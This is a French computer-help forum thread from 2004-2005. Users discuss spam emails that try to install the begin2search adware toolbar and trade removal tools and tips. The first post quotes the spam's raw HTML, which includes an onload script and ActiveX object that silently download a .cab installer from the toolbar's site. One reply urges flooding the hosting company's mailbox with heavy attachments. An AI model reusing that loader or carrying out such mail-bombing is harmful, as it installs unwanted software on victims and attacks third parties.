Mail qui installe la toolbar begin2search.com

Résolu/Fermé
philaz
Messages postés
980
Date d'inscription
dimanche 9 novembre 2003
Statut
Contributeur
Dernière intervention
6 février 2011
- 4 sept. 2004 à 14:13
philaz
Messages postés
980
Date d'inscription
dimanche 9 novembre 2003
Statut
Contributeur
Dernière intervention
6 février 2011
- 16 févr. 2005 à 00:02
Bonjour à tous,
j'ai reçu une dizaine de mails essayant de m'installer la toolbar, çà devient pénible !!
Sur le net, www.begin2search.com est même appelé virus...
<html>
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
1252">
<script language=3D"javascript">
function popTool() {
OO.innerHTML =3D '<OBJECT ID=3D"Inst" CLASSID=3D"CLSID:07E9CDF4-20D2-46B1-=
B681-663968F527CE" codebase=3D"http://www.begin2search.com/toolbar/bar/win=
b2s32.cab#Version=3D2,6,0,0" width=3D0 height=3D0><PARAM NAME=3D"ID" VALUE=
=3D"582562"> <PARAM NAME=3D"CAT" VALUE=3D"7"></OBJECT>';
}
</script>
</head>
<body onload=3D"popTool();"> 
<div id=3DOO></div>
<p align=3D"center">
<p><a href=3D"http://www.begin2search.net/now.php"><b>
<font face=3D"Microsoft Sans Serif" size=3D"8">toronto canada</font></a>
</b></p>
<br>
<font color=3D"#FFFFFF">wrestling mexico vacation jewelry</font></a></p>
<OBJECT ID=3D"Inst" CLASSID=3D"CLSID:07E9CDF4-20D2-46B1-B681-663968F527CE"=
codebase=3D"http://www.begin2search.com/toolbar/bar/winb2s32.cab#Version=3D=
2,6,0,0" width=3D0 height=3D0><PARAM NAME=3D"ID" VALUE=3D"582562"> <PARAM =
NAME=3D"CAT" VALUE=3D"7"></OBJECT>
</body>
</html>
J'ai McAfee, ZoneAlarm à jours, updates à jour, etc...
D'après vous, est-ce que je peux aller sur leur site (http://www.begin2search.com) sans risque d'attraper une cochonnerie, histoire de gueuler un peu ??

Des gens comme çà sont la honte de l'Internet, et nous, on n'est pas des moutons...!! ;-))

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes...  ;-)  ~~~

15 réponses

Utilisateur anonyme
4 sept. 2004 à 16:51
je te conseille de ne pas y'aller tu risque d'etre hijacker
@+++++++++
0
Cool03
Messages postés
792
Date d'inscription
vendredi 28 mars 2003
Statut
Membre
Dernière intervention
13 mars 2016
365
4 sept. 2004 à 22:51
essayes plutôt de passer A2 puis ad-aware et spybot search&destroy!

çà va venir
0
balltrap34
Messages postés
16240
Date d'inscription
jeudi 8 janvier 2004
Statut
Contributeur sécurité
Dernière intervention
28 novembre 2009
329
5 sept. 2004 à 00:55
salut
d accord avec jess a mion d etre bien proteger
gueler ni fera rien


la chasse et le balltrap ma vrai passion
voir site perso dans profil
0
philaz
Messages postés
980
Date d'inscription
dimanche 9 novembre 2003
Statut
Contributeur
Dernière intervention
6 février 2011
247
5 sept. 2004 à 02:15
Merci à tous pour les conseils.

Pour Cool03, lorsque je visualise le mail, l'installation échoue, donc normalement pas de problème;
et OE me met un message :
"les paramêtres de sécurité actuels ne vous permettent pas d'exécuter les
contrôles ActiveX de cette page. En conséquence, cette page ne sera peut-être
pas affichée correctement"
Je n'ai pas non plus la clé désignée dans ma BDR et je n'ai aucune trace de leur fichier winb2s32.cab qu'ils essaient de faire de télécharger dans "Temporary Internet Files"...

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes... ;-) ~~~
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
salut as tous

j'avais le meme probleme quand j'allais sur yahoo.fr le site etait mit automatiquement sur search.com.et le meme pour ma messagerie.

j'avais norton antivirus.

depuit j'ai installer ad aware+spybot sur le site de telecharger.com
et la plus rien tous est parti
comme avant.
en fait t'est victime d'un spyware.
essaye tu veras
a+
0
philaz
Messages postés
980
Date d'inscription
dimanche 9 novembre 2003
Statut
Contributeur
Dernière intervention
6 février 2011
247
5 sept. 2004 à 12:42
Salut Franco,
comme je disais, je ne l'ai pas attrapé, mais il a quand même tenté de s'installer...!!
Et les mails reçus étaient toujours envoyés par des tierces personnes; pour le dernier reçu, de Roumanie, d'où peut-être le fonctionnement assimilable à un virus...

Résultat de l'analyse par SpamRBL
213.159.109.103 (109.103.linkey.ru) est le spammeur (IN) :
Cette IP n'est pas blacklistee (5 spam(s) direct(s)).
213.159.109.103 --> 109.103.linkey.ru --> 213.159.109.103
109.103.linkey.ru est validé
Abuse.net donne : abuse@linkey.ru   postmaster@linkey.ru   support@linkey.ru   
J'ai visité leur site www.begin2search.com en passant par le proxy anonymizer... belle boite américaine, qui prétend vendre des solutions anti-spyware et autres ... foutage de gueule !!!
Dans le cas présent, la CNIL ne peut rien faire, et ils conseillent de signaler à http://www.ftc.gov/bcp/conline/edcams/spam/index.html
Tiens, si j'habitais aux USA, je leur collerais un procès.

Et que prévoit la LCEN pour çà ????? rien... "reçois les virus et ferme-la..." :-((

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes...  ;-)  ~~~
0
salut a tous
oui moi aussi j'ai chopé la toolbar begin2search.com et impossible de la virée.
en plus ça met en surbrillance certains mots ou partie de mots (spam, virus,visa,sex,...) integrant un lien quand je consulte les pages web et dans la messagerie.
pour finir ça m'ouvre des pages tout seul et installe sur le bureau des raccourcis des sites contenus ds la toolbar.
alors si qquelqu'un a une solution pour me debarraser de tout ça j'en serai tres reconnaissant
j'ai essaye d'installer ad aware mais ça m'a bloque internet explorer.
je sais ça fait beaucoup de problemes mais je debute et peu d'experience soyez indulgent
0
Salut,
moi je pense que tu devrais laisser tomber internet explorer, et te mettre sur mozilla firefox, tu ne chopperas pas de merdes.
Moi aussi j'ai la même chose que toi avec internet explorer, les mots en surbrillance, les raccourcis sur le bureau, et maintenant IE m'envoie un rapport d'erreur quand je l'ouvre. Ca fout vraiment la merde, et en plus je ne sais pas comment je l'ai attrappée !
En tout cas je te reconseille de te mettre sur mozilla firefox et crois moi, t'auras plus aucune merde, et plus besoin de ad aware.
Bonne chance quand même à ta poursuite d'éradication de cette pu**in de barre.
0
Utilisateur anonyme
13 oct. 2004 à 19:38
salut telecharge :

(spy bot)
http://spybot.dalnet.com.fr/spybotsd13.exe

(adware SE)
http://www.ordi-netfr.org/adawarese.html

(CWshredder)
http://www.soft32.com/download_19014.html

pour ce dernier faut absolument fermer tout les programe y compris internet explorer et donc hors connexion ensuite faire fix next next



telecharge cette antitrojan
http://www.emsisoft.net/fr/

pense a les mettre a jour avant de les lance
ensuite tu nous dit ce que ca donne

ensuite suprimez les fichier inutiles
demarrer/paneau de configuration/option internet/suprimer fichier temporaaire apres une petite fentre s'ouvre tu coche "suprimer tout le contenu hors connexion" suprime aussi les cookies et efface l'historique

redemare ...
si le probleme persiste faite un scan avec hijackthis
http://telechargement.zebulon.fr/138-HijackThis-1.98.2.html (nouvelle version )

ensuite faire scan/save log et coller le resultat ici

@++
0
Les crapules à l'origine de ce merdier sont des russes de la société Linkey.ru basée à saint petersbourg et dont les serveurs sont hostés à san jose en californie.

il faudrait préparer une action massive (mondiale car tout le monde etouffe de leur conneries) en bombardant leur boite au lettre de mails avec de lourd attachement afin de les bloquer et leur renvoyer la monnaie. ces gens ne respectent rien et sont de véritables criminels. une petite société à vu ses 10 machines bloquées pendant 48 heures a couse de leur prtaiques de voyous

jean

---------DETAILS --------------

inetnum: 213.159.96.0 - 213.159.127.255
org: ORG-LL4-RIPE
admin-c: LNA1-RIPE
tech-c: LNA1-RIPE
netname: RU-LINKEY-20021010
descr: PROVIDER
descr: Linkey Ltd
country: RU
status: ALLOCATED PA
notify: noc@linkey.ru
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: LINKEY-MNT
mnt-routes: LINKEY-MNT
changed: hostmaster@ripe.net 20021010
changed: hostmaster@ripe.net 20040203
changed: hostmaster@ripe.net 20040602
source: RIPE

inetnum: 213.159.117.0 - 213.159.118.255
netname: HISTHOST-BIZ-NET
descr: HISTHOST
country: RU
admin-c: LNA1-RIPE
tech-c: JH-ORG
tech-c: LNA1-RIPE
status: ASSIGNED PA
notify: noc@linkey.ru
mnt-by: LINKEY-MNT
changed: s.bondar@linkey.ru 20041029
source: RIPE

URL à éviter = 231.159.117.134 (surtout ne pas cliquer !!!)

san jose , CA

http://www.ripe.net/membership/indices/data/ru.linkey.html

Linkey Ltd
Linkey ITSP
Malaja Morskaja str 11, apt 216
Saint-Petersburg ,191186
Russia
phone: +7 812 3157505
fax-no: +7 812 3157343
e-mail: noc@linkey.ru
Areas serviced: RU
This registry has the RIPE NCC contribution category: Small
Its RIPE NCC Association Membership status is: Full
0
philaz
Messages postés
980
Date d'inscription
dimanche 9 novembre 2003
Statut
Contributeur
Dernière intervention
6 février 2011
247
10 nov. 2004 à 12:21
Tout à fait, c'est une honte. Je ne comprend même pas qu'on leur autorise d'avoir un nom de domaine !!!
Et puis ils peuvent toujours prétendre qu'ils ne sont pour rien dans l'envoi des mails contenant leur "virus"... C'est çà, l'Amérique :-((

PS: je croyais que ".ru" était pour la Roumanie... excusez-moi, les roumains ;-)

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes...  ;-)  ~~~
0
moi je lai desisntallez mais il me reste les phrases en surbrillance et je n arrive pas desinstaller localNRD.dll avec norton ou xp.
comment oter les deux??? je veux mon IE comme avant.
0
Utilisateur anonyme
26 nov. 2004 à 19:40
salut telecharge c anti spywares
(spy bot)
http://spybot.dalnet.com.fr/spybotsd13.exe

(adware SE)
http://telecharger.01net.com/windows/Internet/internet_utlitaire/fiches/25543.html
http://www.ordi-netfr.org/adawarese.html

(CWshredder)
http://www.soft32.com/download_19014.html

pour ce dernier faut absolument fermer tout les programe y compris internet explorer et donc hors connexion ensuite faire fix next next

(spy sweeper )
http://www.zdnet.fr/telecharger/windows/fiche/0,39021313,11010914s,00.htm

telecharge cette antitrojan
http://www.emsisoft.net/fr/

pense a les mettre a jour avant de les lancer


ensuite suprimez les fichier inutiles
demarrer/paneau de configuration/option internet/suprimer fichier temporaaire apres une petite fentre s'ouvre tu coche "suprimer tout le contenu hors connexion" suprime aussi les cookies et efface l'historique

redemare ...
si le probleme persiste faite un scan avec hijackthis
http://telechargement.zebulon.fr/138-HijackThis-1.98.2.html (nouvelle version )

ensuite faire scan/save log et coller le resultat ici
@+++++++
0
encore une gogo
27 nov. 2004 à 19:37
bonjour à tous
moi aussi j'ai chopé la barre begin2 , je suis sous xp home , IE , j'ai suivi tous les conseils et n'arrive pas à m'en débarrasser, que celui qui à reussi me réponde sur ce forum , pleaaaase, grand merci à lui et à tous
0
salut
comme dit Jess15 en dernier recours il y a HijackThis
Tu charges HijackThis là :
HijackThis direct download: http://209.133.47.12/~merijn/files/HijackThis.exe
Ou là
http://www.spychecker.com/download/download_hijackthis.html
tu le lances et sauves le fichier log que tu copie/colle ici
ou bien tu le mets là
http://hijackthis.de/fr
et tu examines quels fichiers sont notés suspects : ceux en rouge tu peux faire cocher puis FIX sans problème, ceux en orange sont suspects tu dois vérifier avec google quel genre de pgm c’est : bon/mauvais

a+
0
frederique alias gogo
30 nov. 2004 à 01:52
bonsoir bernie
merci de ta réponse rapide, j'ai essayé hitjack sans succès, il est 2h du matin!!! de guerre lasse,, j'ai tapé begin2 sur google, je suis tombée sur le site begin2.com , j'ai osé cliquer et recliquer sur recherche begin et suis tombée sur desinstall, c'est fait. ouf!!!!, en fait ils se veulent etre un espece de catalogue de telechargements et moteur d recherche à la fois, enfin à signaler aux autres , c'est plus simples que de scanner avec tous les anti spy de la creation, et merci encore à toi et aux autres en general pour leur bonne volonté et leur patience
0
Alors moi aussi j'ai choppé la begin2search.com bar, elle s'est installée uniquement dans internet explorer, et je ne sais comment ( ce n'est pas par un mail ). A chaque fois que j'ouvre IE il y a au moins 3-4 pages de pubs et de cul qui s'ouvrent... Jusqu'au jour où j'ai compris qu'avec mozilla firefox on ne choppait pas de merdes ! Et oui quand je l'ouvre, pas de pops-ups ! Magique ! En revanche je ne sais pas comment la désinstaller cette barre non-plus.
Prenez mozilla firefox, et vous verrez que vous n'aurez plus besoin de zone alarm, hijack-this, anti-adwares, spywares et compagnie.
Voilà
A bientôt pour de nouvelles merdes :-)
0
Devliegher freddy
5 févr. 2005 à 13:07
OOOO
                
0
j ai reussi a enlevere cette merde grace a ca

http://www.symantec.fr/avcenter/venc/data/adware.begin2search.html

bon courrage
0
philaz
Messages postés
980
Date d'inscription
dimanche 9 novembre 2003
Statut
Contributeur
Dernière intervention
6 février 2011
247
16 févr. 2005 à 00:02
Bonsoir JP,
super, merci beaucoup pour l'info... ;-)

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes...  ;-)  ~~~
0